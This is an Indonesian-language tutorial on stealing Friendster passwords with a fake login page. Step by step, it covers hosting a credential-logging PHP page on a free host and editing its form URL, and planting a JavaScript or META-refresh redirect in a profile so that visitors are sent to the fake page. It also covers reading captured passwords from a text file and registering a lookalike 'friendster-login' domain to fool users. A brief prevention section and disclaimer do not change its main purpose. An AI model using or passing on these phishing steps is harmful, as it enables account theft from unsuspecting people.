Tutorial Hack Password Friendster Metode : Fake Login
Level : Pemula & Medium Created By : ciebal
Hacking bukan sekedar teori – s’to Jasakom
Fake login artinya adalah login palsu, maka pada kesempatan kali ini saya akan membahas sedikit tentang Halaman login asli yang di palsukan oleh Hacker untuk mendapatkan Username dan Password Target. Tapi kelemahannya adalah trik ini hanya ampuh bagi pengguna FS yang Awam, bagi yang pintar dan teliti maka trik ini mudah di ketahui. Ada banyak cara untuk mengambil Password orang lain, dan cara yang paling simple adalah Fake Login. Baiklah sekarang akan saya berikan gambaran singkat mengenai Fake Login FS, dalam proses Fake Login FS ada beberapa hal yang harus dipersiapkan, yaitu: 1. Web Hosting Support PHP, terserah apa aja tapi saya sarankan mennggunakan Ripway Karena simple dan mudah di gunakan. 2. Source Code (Saya Sertakan pada file ini) 3. Linker JS yang Update (optional)
Pendaftaran Web Hosting Sekarang kamu harus mempunyai Account di ripway, Maka dari itu kamu harus daftar terlebih dahulu. Berikut cara Daftarnya : 1. Buka http://www.ripway.com 2. Klik Sign Up pada halaman Utama Ripway 3. Maka muncul form-form yang harus kamu isi, isikan terserah kamu 4. Jika sudah lengkap, maka klik Sign Up Now! 5. Jangan Lupa username dan Password yang tadi anda isi Pembuatan File 1. Login pada Ripway 2. Jika sudah login maka tampil halaman utama account kamu, Click Here to View your files. Lihat gambar :
3. Terdapat beberapa pilihan, maka pilih Upload untuk mengupload Source Code yang saya sertakan. Yaitu : friendster.html, login.php, fs.txt, fakelogin.swf.
4. Upload terlebih dahulu file login.php dan fs.txt 5. Modifikasi Kode friendster.html, berikut ini yang mesti kamu ganti: Pada file friendster.html kamu buka dengan Notepad, lalu tekan tombol CTRL+F untuk mencari kata. Pada form pencarian ketikan h1.ripway.com/ciebal/FS/login.php, lalu ganti URL itu dengan URL login.php punya kamu. Misalkan URLnya
adalah
:
h1.ripway.com/namakamu/login.php
lihat
gambar untuk mengetahui bagaimana cara mendapatkan URL tersebut:
6. Jika sudah modifikasi file friendster.html maka kamu harus menguploadnya di ripway dalam satu folder. 7. Kamu sudah mendapatkan URL friendster.html, Fake Login telah selesai dibuat, selanjutnya menempatkan di FS milik kamu.
Menempatkan file friendster.html di FS Kita Untuk menempatkan File yang telah kamu upload tadi, kamu harus memiliki JS Eksternal, berikut caranya untuk membuat JS eksternal. 1. Pada file yang saya sertakan terdapat file fakelogin.swf, buka file tersebut denga notepad, caranya klik kanan file tersebut lalu ada option “open with..” lalu pilih Notepad, jika belum ada maka pili “Choose Program” maka muncul window baru, cari program Notepad. 2. Setelah terbuka file-nya, lalu kamu edit bagian yang di tebalkan dengan URL friendater.html :
//Redirect menyang liyane function getgoing() { top.location="URL FAKE LOGIN KAMU"; }
if (top.frames.length==0) { setTimeout('getgoing()',1000); } 3. Jika sudah di edit maka upload file fakelogin.swf ke ripway, kamu sudah mempunyai URL JS eksternalnya, selanjutnya masukan ke Linker.
Proses Generate ke Linker 1. Kamu sudah memiliki URL JS eksternal yang telah di upload, contoh : h1.ripway.com/namakamu/fakelogin.swf 2. Selanjutnya cari Linker JS yang update, cari saja di google dengan kata “JS Linker” atau kunjungi situs www.balibersatu.com/layout/index3.html 4. Copy URL JS eksternal tadi lalu Paste pada website linker tersebut, lalu klik Generate. Linkerpun telah kamu dapatkan selanjutnya kamu tinggal Save pada FS kamu. 5. Save di Bagian “About Me” atau “Who I want to Meet”
Alternative jika tidak menggunakan JS eksternal Bagi kamu yang merasa sedikit kerepotan karena harus membuat JS eksternal, ada alternative lain yang tidak perlu repot-repot membuat JS eksternal, tapi kekurangan script ini hanya pada proses load yang lambat, kalau menggunakan JS eksternal proses akan lebih cepat. Berikut scriptnya : <META HTTP-EQUIV=Refresh CONTENT='1; URL= URL KAMU '> Simpan di about Me atau Who I want to Meet dan ganti bagian yang saya tebalkan dengan URL friendster.html punya kamu.
INGAT!! : Jika Linker tersebut telah di save pada FS maka jangan sekali-kali edit
FS kamu dengan meng-klik Edit Profile atau mengganti Kata “Shout Outnya” karena akan menyebabkan Linker tidak berjalan. Pokoknya jangan edit profile FS kamu, maka sebelum kamu memasuka Linker Fs kamu sudah di edit sebaik mungkin agar kamu tidak perlu meng-editnya kembali. Apabila Linker sudah tidak berjalan karena kamu meng-edit Profile, maka kamu harus mencari Linker yang lain, yang beda dengan sebelumnya. ++++++ Untuk melihat siapa saja korban yang telah masuk perangkap kita, kamu buka file fs.txt yang telah di upload di ripway.
Pemahaman Lanjut 1. Pemahaman Redirection. Proses yang kita bahas tadi intinya hanya prose redirection atau proses pemindahan halaman web secara otomatis menggunakan script, Script untuk Me-Ridirection adalah file fakelogin.swf , fakelogin.swf berfungsi
untuk memindahkan URL FS kita kepada file friendster.html yang tadi kita buat secara otomatis ketika orang mengunjungi FS kita maka secara otomatis pengunjung akan di bawa ke file friendster.html punya kita yang berisikan Login palsu.
2. Kreatifitas Fakename URL Bagian ini juga sangat mendukung suksesnya Fake Login di FS, atau disebut dengan kreatifitas membuat domain palsu / alamat palsu untuk Fake
Login
FS
kita,
saya
sendiri
menggunakan
domain
http://www.friendster-login.cjb.net dengan bantuan cjb setidaknya alamat depan fakefs tersebut sudah sama dengan FS nya, disini anda dituntun mencari yang bagus untuk Faking domainnya, sehingga orang akan tertipu jika hanya melihat pada bagian tampilan saja.
Yang dibutuhkan adalah hanya Free Domain : http://www.cjb.net (http://www.friendster-login.cjb.net) Fake URL yang mirip dengan http://friendster.com, dan bila dibuka isinya adalah file friendster.html milik kamu, yang ada di ripway.com. Untuk domain terserah kamu, yang penting awalnya harus ada kata friendster, karena apabila orang awam terjebak maka dia tidak memperhatikan alamat yang di Address bar, dan langsung mengetikan Passwordnya. Untuk domain, kamu bisa mencari di GOOGLE yang lebih bagus selain cjb.net agar proses Fake Login kamu berjalan dengan lancar.
Catatan : Sebelum kamu mem-publish Fake Login, maka cobalah terlebih dahulu di FS sendiri (kalau bisa daftar FS baru untuk percobaan). Pengetahuan ini hanya dasar dan bisa kamu kembangkan sendiri.
PENCEGAHAN Agar kamu tidak terlalu menyalahkan saya (walaupun tetap saja bersalah) karena telah memberikan tutorial yang sensitive seperti ini, berikut adalah beberapa Opsi yang harus kita perhatikan agar tidak terjebak oleh orang yang juga memakai Fake Login, diantaranya: 1.
Biasakan membuka FS menggunakan Mozilla Firefox.
2.
Matikan option auto approve, di FS kita karena jika ini tidak dilakukan maka bisa saja teman mengirim comment yang mengandung Phishing. Dengan cara Men-setting “Approve comments automatically”: Pilih “Never”.
3.
Teliti jika ingin login, lihat URL pada Address Bar, jika bukan dari http://www.friendster.com maka jangan berani-berani login, close saja, dan buka dengan alamat yang benar yaitu http://www.friendster.com.
4.
Apabila ketika membuka FS orang tiba-tiba kamu disuruh login kembali maka patut di curigai, Lihat URL yang dada di Address Bar apakah http://www.friendster.com/login.php bukan..? jika bukan maka jangan sekali-kali mengetikan email+password kamu.
Sekian Tutorial singkat dari saya, semoga kamu tidak menjadi korban trik yang bodoh seperti ini. Kamu yang melakukan maka kamu juga yang bertanggung jawab. Jangan membawa Nama lembaga/organisasi, orang lain, atau siapapun untuk melakukan hal seperti ini.
“Saya hanya orang bisa yang ingin selalu belajar dan tidak ingin ketinggalan informasi mengenai teknologi. Apabila kita ketinggalan informasi teknologi maka kita akan dimakan oleh teknologi.” - ciebal “Selalu belajar, jangan takut untuk mencoba, jangan malu bertanya, hargai ilmu, hargai juga yang memberi ilmu, Jangan pelit dengan Ilmu...” - ciebal Hacking bukan sekedar teori – s’to Jasakom Hacking is Art - Hacking No Maling
About Me Name
: Mohamad iqbal
Nick Name
: ciebal, flowchart
Thanks to
: Allah SWT, My Parents, My family, My Teachers, My Friends, Member HC, Member YF, All Reader.
Contact Me Via : Email :
[email protected] FS :
[email protected] YM :
[email protected] Website & Blog : www.my-ciebal.co.cc (Website Pribadi) www.ciebal-collection.co.cc (Free Download) ciebal.wordpress.com (Blog Tutorial Komputer)
Tokoh Favorite Saya :